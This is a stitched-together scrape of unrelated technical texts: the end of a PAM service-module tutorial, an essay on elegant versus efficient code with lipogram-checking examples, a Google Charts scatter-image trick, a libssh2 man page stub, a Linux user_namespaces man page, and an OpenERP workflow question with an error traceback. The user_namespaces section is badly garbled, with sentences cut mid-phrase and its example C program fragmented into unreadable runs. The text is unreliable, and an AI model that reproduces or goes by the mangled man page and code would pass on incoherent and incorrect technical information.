- 57-79: Check to see if the user is a member of the group. If so, deny access, and (if warnings aren't disabled) call the conversation function to pass the appropriate error message back to the user. Note that the denial is always reported to syslog. Note that for brevity we've used strcmp to compare the user names. In a real application we'd probably use strncmp to avoid buffer overflows. Notice also our use of pam_strerror on line 66. This function returns the error message associated with its second argument, in much the same manner as strerror does for regular error messages.
- 80-84: If we get here, the user is not a member of the specified group so access is granted.
- 85-87: Return to the caller.
Service modules are shared objects, so we use the following command to build our example with Sun's Studio compiler.
rich@ultra20# cc -G -Kpic -o pam_service_module.so pam_service_module.c

(Users of gcc should replace -Kpic with -fpic and -G with -shared.)
The PAM infrastructure performs various security checks, so our shared object must be owned by root, as shown in the following example.
rich@ultra20# su -
root@ultra20# chown root:root /home/rich/pam_service_module.so
When we've finished testing our service module and are ready to deploy it, we would normally place the shared object in /usr/lib/security/$ISA, where $ISA represents the instructions set of the target machine. Another place we might install our own modules (if we provide them in package format) is /opt/lib/security/$ISA.
Finally, we need to add an entry for our new module to pam.conf, as shown here.
other account required /home/rich/pam_service_module.so group=staff debug
All being well, named members of the group staff will be denied access. With the user rich being named as a member of the group staff, trying to log in using ssh fails, as shown in the following example. (Using telnet will also fail, but security-conscious people shouldn't use telnet.)
rich@sunblade1000# ssh ultra20
Connection closed by 192.168.0.2
Changing the denied group (to root, for example) allows the user rich to log in, as shown here.
rich@sunblade1000# ssh ultra20
Last login: Sun Dec 2 16:43:05 2007 from sunblade1000
Sun Microsystems Inc. SunOS 5.11 snv_70 October 2007
rich@ultra20#
Removing the user rich from the member list of the group named staff has the same effect.
In this article we described what PAM service modules are, and what they must do (that is, what is expected of a service module). We stated that service modules must implement one or more of the following functions, depending on what the service module is to do: pam_sm_authenticate, pam_sm_acct_mgmt, pam_sm_setcred, pam_sm_open_session, pam_sm_close_session, and pam_sm_chauthtok. We also briefly described the two functions that service modules and PAM consumers use to communicate with each other.
We then described the three types of values that service modules must return to their caller, which indicate that the request was successful, ignored, or resulted in an error (including failure).
After discussing the types of logging a service module is expected to do, and when not to log certain messages, we showed an example service module that implements a policy of denying access to named members of the specified group.
Finally, we showed how to build and install the module, and how to configure PAM to use it.
Elegance and Efficiency
Contents
Elegant code is often efficient. Think of the heap data structure, for example, which always remains exactly as sorted as it needs to be, making it perfect for modelling priority queues. It’s both elegant and efficient — and dazzlingly so.
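The heap's just-sorted-enough behaviour is easy to see with Python's standard heapq module (a sketch of my own, not part of the discussion that follows):

```python
import heapq

# push (priority, task) pairs in arbitrary order; the heap keeps
# only as much order as it needs to pop the smallest item first
tasks = [(3, "low"), (1, "urgent"), (2, "normal")]
heap = []
for task in tasks:
    heapq.heappush(heap, task)

# popping drains the queue in priority order
order = [heapq.heappop(heap)[1] for _ in range(3)]
```

Both push and pop cost O(log n), with the heap stored flat in an ordinary list.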
This article discusses the relationship between elegance and efficiency in more depth, and asks the question: Can inefficient code ever be elegant?
What is Elegant Code?
First, we should consider what’s meant by “elegant code”.
Anthony Williams discusses this very subject in a recent blog post (which is what got me thinking about it in the first place). Up front he admits the search for elegance is subjective and that the factors he lists are all “my opinion”. He also points out his list is not exhaustive. Nonetheless, it’s a good starting point, and I’d like to build on it. Let’s start by summarising his list here.
Factors affecting the elegance of software
- Does it work?
- Is it easy to understand?
- Is it efficient?
- Short functions
- Good naming
- Clear division of responsibility
- High cohesion
- Low coupling
- Appropriate use of OO and other techniques
- Minimal code
Appearance
I’m not sure this list completely nails elegance. For a start, there’s no mention of appearance — the way the code actually looks, on screen, or in print — which in my opinion is fundamental. Elegant code looks clean, balanced, self-consistent.
That’s one of the reasons I like Python: it’s hard to get away with poorly laid out code. Scheme, with its minimal syntax, also wins here. Java stands a good chance of doing well on this front too, thanks to a clearly stated set of coding conventions and excellent IDE support for applying these conventions.
Use of standard libraries
I’d also say that appropriate and even cunning use of the language’s standard libraries can add to code’s elegance. Williams hints at this with his mention of Minimal Code, though minimalism covers many other things.
As an example, if you’re using C++, you should take the time to become familiar with the standard library, and use it whenever possible. It works. It’s efficient. In fact it embodies pretty much everything Williams lists, with a few notable exceptions (no one could describe std::string as minimal, and std::auto_ptr is notoriously slippery). Use the standard library and you’ll save yourself code and time, and your own code will be the more elegant for it.
Planar vectors in Scheme
Let’s return to Scheme to illustrate my point about cunning use of standard libraries and consider exercise 2.46 from the Wizard Book, which asks us to implement a data abstraction for two-dimensional vectors: a constructor make-vect, selectors xcor-vect and ycor-vect, and the operations add-vect, sub-vect and scale-vect.
An obvious solution would be to model the 2-D vector as a pair.
(define make-vect cons)
(define xcor-vect car)
(define ycor-vect cdr)

(define (add-vect v w)
  (make-vect (+ (xcor-vect v) (xcor-vect w))
             (+ (ycor-vect v) (ycor-vect w))))

(define (sub-vect v w)
  (make-vect (- (xcor-vect v) (xcor-vect w))
             (- (ycor-vect v) (ycor-vect w))))

(define (scale-vect s v)
  (make-vect (* s (xcor-vect v))
             (* s (ycor-vect v))))
An elegant alternative builds on Scheme’s support for complex numbers.
;; represent a 2-D vect using a complex number
(define make-vect make-rectangular)
(define xcor-vect real-part)
(define ycor-vect imag-part)
(define add-vect +)
(define sub-vect -)
(define scale-vect *)

;; some other vector operations come for free
(define magnitude-vect magnitude)
(define make-vect-from-polar-coords make-polar)
(define angle-vect angle)
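The same trick works in any language with complex numbers built in. Here is a Python analogue (a sketch of my own mirroring the Scheme names; it assumes Python 2.6 or later for cmath.phase):

```python
import cmath

# model 2-D vectors with Python's built-in complex type
make_vect = complex
xcor_vect = lambda v: v.real
ycor_vect = lambda v: v.imag
add_vect = lambda v, w: v + w
sub_vect = lambda v, w: v - w
scale_vect = lambda s, v: s * v

# and, as in the Scheme version, some operations come for free
magnitude_vect = abs
angle_vect = cmath.phase
```

Arithmetic, magnitude and angle all piggyback on machinery the language already provides.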
Minimalism and Simplicity
Elegance and beauty are not the same, though perhaps elegant forms a subset of beautiful. Elegance carries the additional connotation of simplicity, which itself correlates with minimalism. If I were forced to select the single item from Williams’ list most closely aligned to elegance, I’d go for minimalism: allowed my own choice, it would be simplicity.
Williams notes a couple of ways you can remove to improve:
- avoid unnecessary layering
- eliminate duplication
We’ve already added:
- use standard libraries
Kevlin Henney gives minimalism more careful attention in a series of articles. Omit Needless Code promotes:
Code that is simple and clear, brief and direct.
Henney illustrates his points with some elegant examples which reinforce my own claims about the C++ standard library.
Efficiency and Elegance?
Efficiency comes high on Williams’ list, right after correctness, which shouldn’t be a surprise to anyone who writes code for a living. Surely code which doesn’t run fast enough is about as useful as code which doesn’t work? You could even note that efficiency is yet another aspect of minimalism: in this case, it’s the machine’s resource consumption you’d like to reduce.
I’m not convinced, though. It’s true, many of the most elegant algorithms happen to be efficient too — and may even have arisen from the quest for efficiency. Thus the standard quicksort algorithm has virtually no space overhead, and as a general purpose sorting algorithm, really can’t be beaten. Similarly the heap, as already mentioned, is a lean clean implementation of a priority queue. But I don’t think elegance implies efficiency. I’d even suggest that something could be elegant but of no practical use, at least not on today’s hardware.
The downside of efficiency is that it can be at odds with simplicity and minimalism. Consider the sad fate of boost::lexical_cast, a general purpose conversion function. If I go back to early Boost releases I find code which reads like this.
template<typename Target, typename Source>
Target lexical_cast(Source arg)
{
# ifndef BOOST_NO_STRINGSTREAM
    std::stringstream interpreter;
# else
    std::strstream interpreter; // for out-of-the-box g++ 2.95.2
# endif
    Target result;

    if(!(interpreter << arg) ||
       !(interpreter >> result) ||
       !(interpreter >> std::ws).eof())
        throw bad_lexical_cast();

    return result;
}
For brevity I’ve omitted file headers, include guards and the unexceptional definition of boost::bad_lexical_cast. Even with these present, the file runs to just 68 lines long, and provides an elegant example of what generic C++ code can do. The body of lexical_cast itself is a readable one-liner, tainted only by a preprocessor workaround for non-compliant compilers.
Wind forwards to 2007, and this small stain has spread across the entire library, which, after tuning for correctness, portability and efficiency, now weighs in at well over 1K lines of code. Here’s a flavour of the latest greatest lexical_cast, which is far too long to include in its entirety.
namespace detail // lcast_put_unsigned
{
    // I'd personally put lcast_put_unsigned in .cpp file if not
    // boost practice for header-only libraries (Alexander Nasonov).
    template<typename T, typename CharT>
    CharT* lcast_put_unsigned(T n, CharT* finish)
    {
        CharT thousands_sep = 0;
#ifdef BOOST_LEXICAL_CAST_ASSUME_C_LOCALE
        char const* grouping = "";
        std::size_t const grouping_size = 0;
#else
        std::locale loc;
        typedef std::numpunct<CharT> numpunct;
        numpunct const& np = BOOST_USE_FACET(numpunct, loc);
        std::string const& grouping = np.grouping();
        std::string::size_type const grouping_size = grouping.size();

        if(grouping_size)
            thousands_sep = np.thousands_sep();
#endif
        std::string::size_type group = 0; // current group number
        char last_grp_size = grouping[0] <= 0 ? CHAR_MAX : grouping[0];

        // a) Since grouping is const, grouping[grouping.size()] returns 0.
        // b) It's safe to assume here and below that CHAR_MAX
        //    is equivalent to unlimited grouping:
#ifndef BOOST_NO_LIMITS_COMPILE_TIME_CONSTANTS
        BOOST_STATIC_ASSERT(std::numeric_limits<T>::digits10 < CHAR_MAX);
#endif
        char left = last_grp_size;

        do
        {
            if(left == 0)
            {
                ++group;
                if(group < grouping_size)
                {
                    char const grp_size = grouping[group];
                    last_grp_size = grp_size <= 0 ? CHAR_MAX : grp_size;
                }

                left = last_grp_size;
                --finish;
                *finish = thousands_sep;
            }

            --left;
            --finish;
            int const digit = static_cast<int>(n % 10);
            int const cdigit = digit + lcast_char_constants<CharT>::zero;
            *finish = static_cast<char>(cdigit);
            n /= 10;
        } while(n);

        return finish;
    }
}
I’m not saying that the changes to boost::lexical_cast are bad: after all, users of the library get software which does the right thing more often and more quickly — all without any client-side changes. That’s one of the benefits of using a layered software stack. Rather, I present this as an example of the tension between efficiency and elegance. Somewhere along the line, an elegant piece of code got buried.
It’s also interesting that, in this case, even “does-it-work” counteracts elegance. We noted that
boost::lexical_cast@v1.22 became tainted in its eagerness to work with legacy compilers. The current version makes far greater concessions. It’s a reminder — as if any were needed — that we programmers have to keep our feet on the ground and aim for pragmatic solutions. Perfection is rarely possible, elegance occasional.
Elegance and Inefficiency?
We’ve demonstrated the tension between elegance and efficiency, but could blatantly inefficient code ever claim to be elegant? The original elegant implementation of
lexical_cast may not have been optimally tuned for all possible inputs (it’s meant to be generic code, after all), but it could hardly be described as inefficient.
We’re going to develop some code which I’ll claim is elegant despite being inefficient. To get us started, let’s consider another problem we can skin in more than one way: how do we determine if a book forms a lipogram? (A lipogram is a piece of text written avoiding the use of a particular character, the letter E for example, and full length books really have been written — and even translated — which adhere to this constraint.)
We’ll pose the problem in C++. Here’s the function prototype.
```cpp
#include <string>
#include <vector>

typedef std::string word;
typedef std::vector<word> book;

// Return true if the input text avoids using any characters
// in 'avoid', false otherwise.
// Example call:
//   bool const lipo = is_lipogram(text, "Ee");
bool is_lipogram(book const & text, word const & avoid);
```
What we have here might be seen as a loop within a loop within a loop: for each word in the book, for each character in that word, check against each character in the string of characters to be avoided. A match against an avoided character means we know our book isn’t a lipogram, and we can return false; but if we reach the end of our book without such a match, we can return true.
is_lipogram1
We can code this up:
```cpp
typedef word::const_iterator word_iter;
typedef book::const_iterator book_iter;

bool is_lipogram(book const & text, word const & avoid)
{
    if (text.empty()) {
        return true;
    }
    if (avoid.empty()) {
        return true;
    }
    for (book_iter w = text.begin(); w != text.end(); ++w) {
        for (word_iter c = w->begin(); c != w->end(); ++c) {
            for (word_iter a = avoid.begin(); a != avoid.end(); ++a) {
                if (*c == *a) {
                    return false;
                }
            }
        }
    }
    return true;
}
```
This painstaking chunk of code reads like a direct transcription of the way an unfortunate human proof-reader might approach the task, one finger tracking through the text, word by word, character by character, another finger repeatedly working through the characters to be avoided. It fails the elegance test on a number of counts:
- Not minimal. The edge cases do not merit special treatment. Normal processing of the (nested) main loop handles empty inputs just fine.
- Failure to use the standard library. The
std::string class is big enough to support searches for characters in a string directly, allowing us to remove a couple of layers of nesting.
- Clumsy. The function has four separate exit points.
Perhaps none of these charges seem too bad in such a small function, but small functions have a tendency to grow into larger ones, and flaws, in particular, scale rapidly.
is_lipogram2 & 3
Here’s a standard-library-aware improvement.
```cpp
bool is_lipogram(book const & text, word const & avoid)
{
    for (book_iter w = text.begin(); w != text.end(); ++w) {
        if (w->find_first_of(avoid) != std::string::npos) {
            return false;
        }
    }
    return true;
}
```
Many programmers would leave it at that, but I still prefer to re-cast this particular variant as follows:
```cpp
bool is_lipogram(book const & text, word const & avoid)
{
    book_iter w = text.begin();
    while (w != text.end() &&
           w->find_first_of(avoid) == std::string::npos) {
        ++w;
    }
    return w == text.end();
}
```
Rather than exit as soon as we detect a character in the
avoid string, we keep reading as long as there’s text to read and we’ve avoided such characters. There’s not much in it, especially in such a small function, but my preference is to simplify the control flow.
is_lipogram4
We can remove the explicit iteration from our code by using the
std::find_if algorithm, which accepts a predicate. In this case we want to find the first word which isn’t itself a lipogram. Combining the
std::not1 function adaptor with a hand-written class deriving from
std::unary_function<std::string const, bool> does the job.
This code demonstrates proper use of the STL predicates and adaptors, but it also reaches the limits of my personal comfort zone for using C++ in a functional programming style. The price paid for avoiding explicit iteration is just too high; clever though this code may be, I don’t find it elegant.
When I first coded up
lipogram_word_tester, it derived from
std::unary_function<word const &, bool>. This turns out to be wrong, or at least, it failed to compile with a typically cryptic diagnostic, and I’m still not sure why!
```cpp
// Simple functor for use in lipogram algorithms
class lipogram_word_tester
    : public std::unary_function<std::string const, bool>
{
public:
    lipogram_word_tester(word const & avoid)
        : avoid(avoid)
    {
    }
    bool operator()(word const & w) const
    {
        return w.find_first_of(avoid) == std::string::npos;
    }
private:
    word const avoid;
};

bool is_lipogram(book const & text, word const & avoid)
{
    lipogram_word_tester const word_test(avoid);
    return find_if(text.begin(), text.end(),
                   not1(word_test)) == text.end();
}
```
is_lipogram5
I would expect all four functions presented so far to be similarly efficient in terms of memory, stack, CPU cycles.
A recursive solution may require more stack: it depends on the compiler. We’ve now got two functions, and although each comprises just a single expression, the expression forming the body of the recursive helper function,
is_lipo(), is tricky. I wouldn’t recommend this implementation.
```cpp
bool is_lipo(book_iter wb, book_iter we, word const & avoid)
{
    return wb == we ||
           wb->find_first_of(avoid) == std::string::npos &&
           is_lipo(++wb, we, avoid);
}

bool is_lipogram(book const & text, word const & avoid)
{
    return is_lipo(text.begin(), text.end(), avoid);
}
```
is_lipogram6
Our final alternative is a clear winner on the three fronts which led us to reject our original implementation: it's brief, it leans heavily on the standard library, and it has just a single exit point — in fact, it is just a single expression.
```cpp
bool is_lipogram(book const & text, word const & avoid)
{
    return accumulate(text.begin(), text.end(),
                      std::string()).find_first_of(avoid)
           == std::string::npos;
}
```
Does it qualify as elegant? I’d say so, yes. Sadly, though, its inefficiency rules it out as a heavy-duty lipogram checker. The
std::string class is not designed for repeated addition — which is what
std::accumulate does.
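The cost is easy to demonstrate in Python (used here for brevity; the repeated-copying problem in the C++ version is the same in kind). Both helpers below are hypothetical illustrations, not code from the article:

```python
def concat_repeated(words):
    # Builds the result with repeated +, which in general re-copies
    # everything accumulated so far at each step: quadratic in total size.
    text = ""
    for w in words:
        text = text + w
    return text

def concat_join(words):
    # Computes the final size once and copies each character once: linear.
    return "".join(words)
```

This is exactly why style guides steer bulk string assembly towards a single join (or a stream/builder type) rather than repeated concatenation of immutable strings.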
Winding Up
Actually none of the C++ lipogram checkers are much use, except in the case when we’re certain our book is written in 7-bit ASCII. A lipogram which avoids the letter E should also avoid its various accented forms: é, è, ê, ë, É, È, Ê, Ë, …
A heavy-duty lipogram checker needs to work in Unicode and, for C++ at least, will have to establish some ground rules for input encoding schemes. The current C++ standard (C++98) has little to say about Unicode. We'd be better off using a more Unicode-aware language, such as Java.
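One way to treat accented forms as the same letter, sketched here with Python's unicodedata module (this is an assumption-laden illustration, not code from the article), is to compare base characters after canonical decomposition, so that é, è, ê and friends all count as E:

```python
import unicodedata

def base_char(ch):
    """Return ch with any combining marks stripped (NFD base character)."""
    decomposed = unicodedata.normalize("NFD", ch)
    return "".join(c for c in decomposed
                   if not unicodedata.combining(c))

def is_lipogram(words, avoid):
    """Accent-insensitive, case-insensitive lipogram check."""
    avoid_set = {base_char(a).casefold() for a in avoid}
    return all(base_char(ch).casefold() not in avoid_set
               for w in words
               for ch in w)
```

Precomposed characters such as é decompose under NFD into a base letter plus combining marks, so stripping the marks leaves plain "e" for the membership test.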
Python allows us to create a character stream which accumulates all the characters in all the words, but yields them lazily. The function below uses
itertools.chain to flatten the input words (which themselves may be a stream or an in-memory collection) into a character stream. The built-in
all function reads exactly as far into this stream as it needs to. In other words, we’ve got a Python counterpart to our final C++ algorithm which is both efficient (efficient for Python that is!) and equally happy with Unicode and ASCII.
```python
import itertools

def is_lipogram(words, avoid):
    return all(ch not in avoid
               for ch in itertools.chain(*words))
```
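One subtlety worth noting: chain(*words) unpacks the word stream eagerly, so only the character scan is lazy. A variant using itertools.chain.from_iterable keeps even the word stream lazy; the instrumentation below is hypothetical, added to make the early exit visible:

```python
import itertools

def is_lipogram(words, avoid):
    # from_iterable pulls words one at a time, so an early match
    # stops the scan without reading the rest of the stream.
    chars = itertools.chain.from_iterable(words)
    return all(ch not in avoid for ch in chars)

consumed = []

def word_stream():
    for w in ["ski", "yacht", "every", "word"]:
        consumed.append(w)
        yield w

result = is_lipogram(word_stream(), "Ee")
# The generator is abandoned at "every"; "word" is never pulled.
```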
C++ Source Code
```cpp
#include <algorithm>
#include <cassert>
#include <functional>
#include <iostream>
#include <iterator>
#include <numeric>
#include <set>
#include <string>
#include <vector>

namespace {

typedef std::string word;
typedef word::const_iterator word_iter;
typedef std::vector<word> book;
typedef book::const_iterator book_iter;
typedef bool (* lipo_fn)(book const &, word const &);

// Return true if the input text avoids using any characters
// in 'avoid', false otherwise.
bool is_lipogram1(book const & text, word const & avoid)
{
    if (text.empty()) {
        return true;
    }
    if (avoid.empty()) {
        return true;
    }
    for (book_iter w = text.begin(); w != text.end(); ++w) {
        for (word_iter c = w->begin(); c != w->end(); ++c) {
            for (word_iter a = avoid.begin(); a != avoid.end(); ++a) {
                if (*c == *a) {
                    return false;
                }
            }
        }
    }
    return true;
}

bool is_lipogram2(book const & text, word const & avoid)
{
    for (book_iter w = text.begin(); w != text.end(); ++w) {
        if (w->find_first_of(avoid) != std::string::npos) {
            return false;
        }
    }
    return true;
}

bool is_lipogram3(book const & text, word const & avoid)
{
    book_iter w = text.begin();
    while (w != text.end() &&
           w->find_first_of(avoid) == std::string::npos) {
        ++w;
    }
    return w == text.end();
}

// Simple functor for use in lipogram algorithms
class lipogram_word_tester
    : public std::unary_function<std::string const, bool>
{
public:
    lipogram_word_tester(word const & avoid)
        : avoid(avoid)
    {
    }
    bool operator()(word const & w) const
    {
        return w.find_first_of(avoid) == std::string::npos;
    }
private:
    word const avoid;
};

bool is_lipogram4(book const & text, word const & avoid)
{
    lipogram_word_tester const word_test(avoid);
    return find_if(text.begin(), text.end(),
                   not1(word_test)) == text.end();
}

bool is_lipo5(book_iter wb, book_iter we, word const & avoid)
{
    return wb == we ||
           wb->find_first_of(avoid) == std::string::npos &&
           is_lipo5(++wb, we, avoid);
}

bool is_lipogram5(book const & text, word const & avoid)
{
    return is_lipo5(text.begin(), text.end(), avoid);
}

bool is_lipogram6(book const & text, word const & avoid)
{
    return accumulate(text.begin(), text.end(),
                      std::string()).find_first_of(avoid)
           == std::string::npos;
}

void read_book(book & text, std::istream & input)
{
    typedef std::istream_iterator<word> in;
    std::copy(in(input), in(), back_inserter(text));
}

// Function-like class used for lipo_fn evaluation.
class lipo_functor {
public:
    // Construct an instance of this class, caching lipo_fn parameters.
    lipo_functor(book const & text, word const & avoid)
        : text(text)
        , avoid(avoid)
    {
    }
    // Return the result of applying is_lipo to the cached parameters.
    bool operator()(lipo_fn is_lipo)
    {
        return is_lipo(text, avoid);
    }
private:
    book const & text;
    word const & avoid;
};

void check_if_lipogram(std::ostream & report,
                       book const & text,
                       word const & avoid)
{
    typedef std::set<bool> answers;
    lipo_fn const lipo_fns[] = {
        is_lipogram1,
        is_lipogram2,
        is_lipogram3,
        is_lipogram4,
        is_lipogram5,
        is_lipogram6,
    };
    lipo_functor lipo_func(text, avoid);
    answers results;
    lipo_fn const * const end =
        lipo_fns + sizeof lipo_fns / sizeof *lipo_fns;
    transform(lipo_fns, end,
              inserter(results, results.end()), lipo_func);
    assert(results.size() == 1);
    report << "Is " << (*results.begin() ? "" : "not ")
           << "a lipogram" << '\n';
}

} // end anonymous namespace

int main()
{
    book text;
    word const avoid = "Ee";
    read_book(text, std::cin);
    check_if_lipogram(std::cout, text, avoid);
    return 0;
}
```
Scatter pictures with Google Charts
In a recent post on his blog Matt Cutts asks:
I almost wanted to call this post “Stupid Google Tricks” :-) What fun diagrams can you imagine making with the Google Charts Service?
Here’s a stupid trick: you can use the Python Imaging Library to convert a picture into a URL which Google charts will render as the original picture.
Here’s the original picture:
here’s the version served up by Google charts:
here’s the code:
```python
import Image
import string

def scatter_pixels(img_file):
    """Return the URL of a scatter plot of the supplied image

    The image will be rendered square and black on white.
    Adapt the code if you want something else.
    """
    # Use simple chart encoding. To make things really simple
    # use a square image where each X or Y position corresponds
    # to a single encode value.
    simple = string.uppercase + string.lowercase + string.digits
    rsimple = simple[::-1]  # Google charts Y reverses PIL Y
    w = len(simple)
    W = w * 3
    img = Image.open(img_file).resize((w, w)).convert("1")
    pels = img.load()
    black_pels = [(x, y)
                  for x in range(w)
                  for y in range(w)
                  if pels[x, y] == 0]
    xs = "".join(simple[x] for x, _ in black_pels)
    ys = "".join(rsimple[y] for _, y in black_pels)
    sqside = 3.0
    return (
        "?"
        "cht=s&"                            # Draw a scatter graph
        "chd=s:%(xs)s,%(ys)s&"              # using simple encoding and
        "chm=s,000000,1,2.0,%(sqside)r,0&"  # square black markers
        "chs=%(W)rx%(W)r"                   # at this size.
        ) % locals()
```
and here’s the url it generates:…&chs=186x186
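For reference, the "simple encoding" used in that URL maps the values 0 through 61 onto the characters A-Z, a-z, 0-9, one character per data point. A quick sketch (a hypothetical helper, mirroring the simple string built in the code above, written for Python 3):

```python
import string

# 62 symbols: index 0 -> 'A', 25 -> 'Z', 26 -> 'a', 61 -> '9'
SIMPLE = string.ascii_uppercase + string.ascii_lowercase + string.digits

def simple_encode(values):
    """Encode integers in range(62) as a Google Charts simple-encoding string."""
    return "".join(SIMPLE[v] for v in values)
```

Because each data point costs exactly one URL character, the number of black pixels translates directly into URL length, which is what triggers the 400 errors mentioned below.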
Smallprint. Google charts may return a 400 error for an image with a long URL (meaning lots of black pixels in this case). The upper limit on URL length doesn’t seem to be documented but a quick trawl through topics on the google charts group suggests others have bumped into it too. Connoisseurs of whacky pictures should pay CSS Homer Simpson a visit.
libssh2_session_callback_set - set a callback function
#include <libssh2.h>
void *libssh2_session_callback_set(LIBSSH2_SESSION *session, int cbtype, void *callback);
Sets a custom callback handler for a previously initialized session object. Callbacks are triggered by the receipt of special packets at the Transport layer. To disable a callback, set it to NULL.
session - Session instance as returned by libssh2_session_init_ex(3)
cbtype - Callback type. One of the types listed in Callback Types.
callback - Pointer to custom callback function. The prototype for this function must match the associated callback declaration macro.
Pointer to previous callback handler. Returns NULL if no prior callback handler was set or the callback type was unknown.
libssh2_session_init_ex(3)
NAME
user_namespaces − overview of Linux user namespaces
DESCRIPTION
Capabilities)). Consequently, unless the process has a user ID of 0 within the namespace, or the executable file has a nonempty inheritable capabilities mask, the process will lose all capabilities.
The rules for determining whether or not a process has a capability in a particular user namespace are as follows: associated with a process’s mount namespace allows that process to create bind mounts and mount the
When:
a) −1 value) unmapped. This is deliberate: (uid_t) −1 is used in several interfaces (e.g., setreuid(2)) as a way to specify "no user ID". Leaving (uid_t) −1:
Writes that violate the above rules fail with the error EINVAL.
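Each record written to /proc/[pid]/uid_map (or gid_map) has the three-field form ID-inside-ns ID-outside-ns length. As a small illustration of that record format (hypothetical helpers, not kernel code), composing and re-parsing such text:

```python
def format_uid_map(mappings):
    """Render (ID-inside-ns, ID-outside-ns, length) triples as uid_map text."""
    return "".join("%d %d %d\n" % m for m in mappings)

def parse_uid_map(text):
    """Parse uid_map text back into (inside, outside, length) triples."""
    records = []
    for line in text.splitlines():
        inside, outside, length = (int(field) for field in line.split())
        if length < 1:
            raise ValueError("range length must be at least 1")
        records.append((inside, outside, length))
    return records
```

A typical single-user mapping is "0 1000 1": UID 0 inside the namespace corresponds to UID 1000 outside it, for a range of one ID.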
In order for a process to write to the /proc/[pid]/uid_map (/proc/[pid]/gid_map) file, all of the following requirements must be met:
Writes that violate the above rules fail with the error EPERM.
Interaction with system calls that change process UIDs or GIDs
The transition only−−−rwx".(2) (−1 TO
Namespaces are a Linux-specific feature.
NOTES
Over
Linux 3.12 added support for the last of the unsupported major filesystems, XFS.
EXAMPLE
$ uname −rs # Need Linux 3.8 or later
Linux 3.8.0
$ id −u # Running as unprivileged user
1000
$ id −g
1000
Now start a new shell in new user (−U), mount (−m), and PID (−p) namespaces, with user ID (−M) and group ID (−G) 1000 mapped to 0 inside the user namespace:
$ ./userns_child_exec −p −m −U −M '0 1000 1' −G '0 1000 1' bash
bash$ mount −t proc proc /proc
bash$ ps ax
PID TTY STAT TIME COMMAND 1 pts/3 S 0:00 bash 22 pts/3 R+ 0:00 ps ax−handling("−i New IPC namespace\n"); fpe("−m New mount namespace\n"); fpe("−n New network namespace\n"); fpe("−p New PID namespace\n"); fpe("−u New UTS namespace\n"); fpe("−U New user namespace\n"); fpe("−M uid_map Specify UID map for user namespace\n"); fpe("−G gid_map Specify GID map for user namespace\n"); fpe("−z Map user's UID and GID to 0 in user namespace\n"); fpe(" (equivalent to: −M '0 <uid> 1' −G '0 <gid> 1')\n"); fpe("−v Display verbose messages\n"); fpe("\n"); fpe("If −z, −M, or −G is specified, −U is required.\n"); fpe("It is not permitted to specify both −z and either −M or −G.\n"); fpe("\n"); fpe("Map strings for −M and −G consist of records of the form:\n"); fpe("\n"); fpe(" ID−inside−ns ID−outside−ns−delimited records of the form: ID_inside−ns ID−outside−ns length Requiring the user to supply a string that contains newlines is of course inconvenient for command−line == −1) { == −1) { /*)) == −1)−>pipe_fd[1]); /* Close our descriptor for the write end of the pipe so that we see EOF when parent closes its descriptor */ if (read(args−>pipe_fd[0], &ch, 1) != 0) { fprintf(stderr, "Failure in child: read from pipe returned != 0\n"); exit(EXIT_FAILURE); } close(args−>pipe_fd[0]); /* Execute a shell command */ printf("About to exec %s\n", args−>argv[0]); execvp(args−>argv[0], args−−line options. The initial '+' character in the final getopt() argument prevents GNU−style permutation of command−line options. That's useful, since sometimes the 'command' to be executed by this program itself has command−line options. We don't want getopt() to treat those as options to this program. 
*/ flags = 0; verbose = 0; gid_map = NULL; uid_map = NULL; map_zero = 0; while ((opt = getopt(argc, argv, "+imnpuUM:G:zv")) != −1) {]); } } /* −M or −G without −U) == −1) errExit("pipe"); /* Create the child in new namespace(s) */ child_pid = clone(childFunc, child_stack + STACK_SIZE, flags | SIGCHLD, &args); if (child_pid == −1)) == −1) /* Wait for child */ errExit("waitpid"); if (verbose) printf("%s: terminating\n", argv[0]); exit(EXIT_SUCCESS); }
SEE ALSO
This page is part of release 4.13 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at https://www.kernel.org/doc/man-pages/.
Change State of Sales Order when changing the state of Purchase order?
Hi, I added a new state to the Sale Quotation workflow, and two other states to the Purchase Quotation workflow. Now I need the state of the Sale Quotation to change automatically from draft to my new state when the state of the Purchase Order changes.

I don't know whether this change belongs in mymodule_workflow.xml or in mymodule.py; I've tried both, but nothing works...
In mymodule_workflow.xml I've tried this:
.... <record id="trans_receivepq_waitingdocs" model="workflow.transition"> <field name="act_from" ref="sale.act_draft"/> <field name="act_to" ref="act_waitingdocs"/> <field name="signal">purchase_received</field> </record> ....
and after I've tried this:
<record id="act_rfq_received" model="workflow.activity"> <field name="wkf_id" ref="purchase.purchase_order"/> <field name="name">received</field> <field name="kind">function</field> <field name="action">write({'state':'received'})</field> </record> <record id="act_po_recpq" model="workflow.activity"> <field name="wkf_id" ref="purchase.purchase_order"/> <field name="name">po_recpq</field> <field name="kind">subflow</field> <field name="subflow_id" search="[('osv','=','sale.order')]"/> <field name="action">write({'state':'waitingdocs'})</field> </record> <record id="trans_sent_received" model="workflow.transition"> <field name="act_from" ref="purchase.act_sent"/> <field name="act_to" ref="act_rfq_received"/> <field name="signal">purchase_received</field> </record> <record id="trans_sent_received_so" model="workflow.transition"> <field name="act_from" ref="purchase.act_sent"/> <field name="act_to" ref="act_po_recpq"/> <field name="signal">purchase_received</field> </record>
But nothing happens, no error no nothing...
Then I've tried like this in mymodule.py :
def contracts_received(self, cr, uid, ids, context=None, default=None): so = {} soid = {} if not default: default = {} soid = default.get('asd_pquotation_id') so = self.pool.get('sale.order').browse(cr,uid,soid) so.write(cr, uid, ids, {'state':'waitingdocs'}) self.write(cr, uid, ids, {'state':'received'}, context=context) return True
and in mymodule_workflow.xml :
<record id="act_rfq_received" model="workflow.activity"> <field name="wkf_id" ref="purchase.purchase_order"/> <field name="name">received</field> <field name="kind">function</field> <field name="action">contracts_received()</field> </record>
This way I get this error:
```
WARNING teste28maio1458 openerp.osv.orm: No such field(s) in model purchase.order.line: code, date, so_calc_id, supplier_id, client_number, namecalc, image, quantity.
2013-05-30 16:13:03,052 16600 ERROR teste28maio1458 openerp.sql_db: bad query: insert into "purchase_order_line" (id,"product_uom","order_id","price_unit","product_qty","partner_id","invoiced","date_planned","company_id","name","state","product_id","account_analytic_id",create_uid,create_date,write_uid,write_date) values (20,5,20,'30.00','1.000','5','False','2013-05-30 00:00:00',NULL,'Service',NULL,1,NULL,1,(now() at time zone 'UTC'),1,(now() at time zone 'UTC'))
Traceback (most recent call last):
  File "/opt/openerp-7.0/openerp/sql_db.py", line 227, in execute
    res = self._obj.execute(query, params)
IntegrityError: null value in column "state" violates not-null constraint
